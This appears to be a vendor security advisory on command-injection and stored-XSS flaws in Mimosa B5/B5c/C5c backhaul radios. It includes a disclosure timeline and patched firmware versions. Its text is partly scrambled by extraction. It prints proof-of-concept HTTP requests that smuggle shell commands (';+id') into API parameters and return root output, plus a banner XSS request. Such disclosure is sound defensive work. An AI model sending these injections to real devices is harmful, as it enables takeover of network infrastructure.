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Mimosa PTP Devices - Multiple Vulnerabilities

CVE-2020-25206,CVE-2020-25205

Type RCE,XSS Severity High Affected products B5c/B5/C5c References

CVE-2020-25205. CVE-2020-25206

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Timeline Unauthenticated RCE 22/05/2020 vulnerability discovered. Vendor contacted, No 26/05/2020 response received. Authenticated RCF 13/07/2020 vulnerabilities discovered XSS vulnerability 17/07/2020 discovered. 07/09/2020 CVE IDs requested. CVE IDs granted from 08/09/2020 MITRE. Follow up email sent 17/09/2020 directly to vendor. No response received. Follow up email sent directly to Mimosa contact. 02/11/2020 Vendor requests further

Introduction

F-Secure identified a number of high risk vulnerabilities on Mimosa Point-To-Point (PTP) Backhaul radio devices, which allow threat actors to achieve the following:

- Remotely execute commands on the device's underlying operating system, either from unauthenticated or authenticated perspectives depending on the device's firmware release.
- Store Cross-Site Scripting (XSS) payloads within the device's web management portals, potentially allowing for credential theft.

These devices are typically used by commercial or private entities to provide wireless network connectivity between two sites. Whilst not required to be accessible from the public Internet F-Secure observed numerous devices that exposed their administrative panel. Each of the vulnerabilities presented below could therefore be leveraged to exploit such devices and gain full control.

These issues can be mitigated by updating to the most recent firmware versions for the B5/B5c/C5c PTP radio devices.

CVE-2020-25206 - Remote Command Execution (Multiple)

- Affected devices: B5/B5c/C5c
- · Affected firmware:
 - Unauthenticated RCE: ≤1.5.3, ≤ 2.5.0.3
 - Authenticated RCE: ≤ 2.8.0.3

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acknowledges vulnerabilities, stemming from the **getThroughput()** method of

vulnerabilities the /var/www/core/api/calls/Througput.php class. This allowed for arbitrary

Vendor shares beta command execution on the underlying device with administrative privileges:

01-02/12/2020 firmware, including patches

for CVE-2020-25205,CVE-2020-25206

F-Secure confirm issues

02-04/12/2020 are no longer present in

latest beta firmware

Vendor officially releases

01/01/2021 firmware upgrades,

containing mitigations

11/05/2021 Advisory published

GET/core/api/calls/Throughput.php?from=1;+id HTTP/1.1

_ 1 100 100 05 1

Host: 192.168.25.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101

Firefox/68.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate

Referer: http://192.168.25.1/index.php
X-Requested-With: XMLHttpRequest

Connection: close

HTTP/1.1 200 OK

Cache-Control: private, no-cache, max-age=0, no-store

X-Powered-By: PHP/5.5.8 Content-type: text/html Connection: close

Date: Tue, 01 Jan 2019 00:18:24 GMT

Server: lighttpd/1.4.33 Content-Length: 53

{"values":{"Throughput":["uid=0(root) gid=0(root)"]}}

Authenticated RCE:

The Mimosa PTP B5, B5c and C5c backhaul radio firmware from versions 2.8.0.3 and below contained authenticated command injection vulnerabilities, stemming from the **get()** method of the following API classes:

- Throughput class (/var/www/core/api/calls/Througput.php)
- WanStats (/var/www/core/api/calls/WanStats.php)
- PhyStats (/var/www/core/api/calls/PhyStats.php)
- QosStats (/var/www/core/api/calls/QosStats.php)

Authentication was introduced in the the 2.8.0.x firmware for these APIs.

The POST request shown below demonstrates how

the **\$duration** parameter of the **WanStats.php** endpoint may be abused to execute arbitrary commands when authenticated. Note that for this to be successful the **\$cf** and **\$resolution** values must also be specified for the user input to be passed to **shell_exec()** method.

POST /core/api/calls/WanStats.php HTTP/1.1

Host: 192.168.1.20

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0)

Gecko/20100101 Firefox/76.0

Accept: application/json, text/javascript, */*; q=0.01

Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.1.20/ X-Requested-With: XMLHttpRequest

DNT: 1

Connection: close

Cookie: PHPSESSID=odekk2go1k8j3hk5pm1grjmg23 Content-Type: application/x-www-form-urlencoded

Content-Length: 43

duration=100;+id;&resolution=100&cf=AVERAGE

HTTP/1.1 200 OK

X-Powered-By: PHP/7.2.22

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate

Pragma: no-cache

Content-type: text/plain;charset=UTF-8

Content-Length: 1580 Connection: close

Date: Wed, 01 Jan 2020 01:13:37 GMT

Server: lighttpd/1.4.54

txFrOK_0 txFrTotal_0 txOctetsOK_0 txFrErr_0 txFrSingleClsn_0 txFrMultipleClsn_0 txFrLateClsn_0 txFrExcessiveClsn_0 txFrUnicast_0 txFrMulticast_0 txFrBroadcast_0 txFrPause_0 rxFrOK_0 rxFrTotal_0 rxFrCrcErr_0 rxFrAlignErr_0 rxFrTotalErr_0 rxOctetsOK_0 rxOctetsTotal_0 rxFrUnicast_0 rxFrMulticast_0 rxFrBroadcast_0 rxFrPause_0 rxFrLenErr_0 rxFrUndersized_0 rxFrOversized_0 rxFrFrags_0 rxFrJabber_0 rxFrLen64_0 rxFrLen65-127_0 rxFrLen128-255_0 rxFrLen256-511_0 rxFrLen512-1023_0 rxFrLen1024-1518_0 rxFrLenOver1518_0 rxFrDropBufFull_0 rxFrTuncBufFull_0

1577841200: 4.0650000000e+00 4.0650000000e+00 2.6227600000e+03

0.000000000e+00 0.00000000e+00 0.00000000e+00

0.000000000e+00 0.000000000e+00 3.820000000e+00

0.000000000e+00 2.450000000e-01 0.000000000e+00

3.2750000000e+00 3.2750000000e+00 0.000000000e+00

0.000000000e+00 0.000000000e+00 4.7951500000e+02

4.7951500000e+02 3.0950000000e+00 0.0000000000e+00

1.800000000e-01 0.000000000e+00 0.000000000e+00

0.000000000e+00 0.000000000e+00 0.000000000e+00

0.000000000e+001.800000000e-012.535000000e+00

0.000000000e+00.4.400000000e-01.1.200000000e-01

0.000000000e+00 0.000000000e+00 0.000000000e+00

0.0000000000e+00

uid=0(root) gid=0(root)

CVE-2020-25205 - Unauthenticated Stored XSS

• Affected devices: B5/B5c/C5c

• Firmware: ≤ 2.8.0.3

Read more □

The web console could be configured to display a banner to unauthenticated users when the base URL is requested. It was found that no authentication was required to set the banner text for an affected device and that its content's could be leveraged to introduce arbitrary JavaScript code.

The following POST request could be sent to vulnerable devices to configure the banner text and introduce a benign "alert(1)" XSS payload:

POST /?q=index.set_banner HTTP/1.1

Host: 192.168.1.20

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101

Firefox/68.0

-----4580394065576203491155952929--

The XSS payload would triggered by visiting the web console without authentication, as shown in the screenshot below. Note that the banner could not be removed after updating the contents of /mnt/jffs2/banner.txt. To remove the banner, the file must either be deleted from disk, this would require an administrator login to the device over telnet or SSH.



Solution

It is recommended that B5/B5c/C5c device operators upgrade the firmware to the latest stable versions. Mitigations for CVE-2020-25205 and CVE-2020-25206 were introduced in the following firmware releases:

- 1.5.5
- 2.5.4
- 2.8.1

Firmware versions can be obtained from the following URL, after enrolling for a Mimosa account:

• https://cloud.mimosa.co/app/index.html#/updateFirmware/firmwareDownload/

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